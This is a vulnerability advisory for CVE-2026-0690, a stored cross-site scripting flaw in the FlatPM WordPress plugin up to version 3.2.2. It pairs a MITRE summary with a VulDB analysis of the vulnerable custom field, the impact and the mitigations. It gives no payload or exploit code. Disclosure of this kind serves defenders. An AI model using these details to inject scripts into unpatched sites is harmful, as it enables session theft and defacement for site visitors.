CVE-2026-0690 in FlatPM Plugin
Summary
by MITRE • 01/20/2026
The FlatPM – Ad Manager, AdSense and Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rank_math_description' custom field in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 01/22/2026
The vulnerability identified as CVE-2026-0690 affects the FlatPM – Ad Manager, AdSense and Custom Code plugin for WordPress, presenting a critical security risk through stored cross-site scripting flaws. This issue exists in all versions up to and including 3.2.2, making it a widespread concern for WordPress site administrators who rely on this plugin for ad management and custom code implementation. The vulnerability specifically targets the 'rank_math_description' custom field, which serves as an entry point for malicious code injection that can persist across multiple user sessions and page views.
The technical flaw stems from inadequate input sanitization and output escaping mechanisms within the plugin's code implementation. When authenticated users with contributor level access or higher submit content through the 'rank_math_description' custom field, the plugin fails to properly validate or sanitize the input data before storing it in the database. Additionally, the output escaping mechanisms that should prevent malicious scripts from executing when the content is displayed are insufficient or absent entirely. This combination of weaknesses creates a persistent stored XSS vulnerability that allows attackers to inject malicious JavaScript code that will execute whenever any user accesses pages containing the injected content.
The operational impact of this vulnerability is significant for WordPress site administrators and their users. Attackers with contributor-level privileges or higher can leverage this vulnerability to execute arbitrary web scripts in the context of any user's browser who accesses affected pages. This capability enables various malicious activities including credential theft through session hijacking, redirection to malicious websites, defacement of content, and potential exploitation of other vulnerabilities through browser-based attacks. The stored nature of the vulnerability means that once injected, the malicious code persists until manually removed, making it particularly dangerous as it can affect multiple users over extended periods without detection.
From a cybersecurity framework perspective, this vulnerability aligns with CWE-79: Improper Neutralization of Input During Web Page Generation, which specifically addresses the failure to properly escape or sanitize user input before incorporating it into web pages. The ATT&CK framework categorizes this as a technique involving code injection and privilege escalation, as attackers must first gain contributor-level access before exploiting the vulnerability. The vulnerability also relates to the broader category of web application security issues that fall under the OWASP Top Ten, specifically addressing the risk of cross-site scripting attacks that can compromise user sessions and data integrity. Organizations should implement immediate mitigations including updating to the latest plugin version, implementing proper input validation measures, and considering additional security layers such as web application firewalls to protect against exploitation attempts.
Mitigation strategies should include immediate patching of the vulnerable plugin to the latest secure version, implementing comprehensive input validation and output escaping mechanisms, and establishing monitoring procedures to detect suspicious activity in custom fields. Administrators should also consider role-based access controls to limit contributor-level access to only necessary personnel and implement regular security audits of custom fields and plugin configurations. Additionally, network-level security measures such as web application firewalls and intrusion detection systems can provide additional protection layers against exploitation attempts while ensuring that the underlying vulnerability is properly addressed through official patching procedures.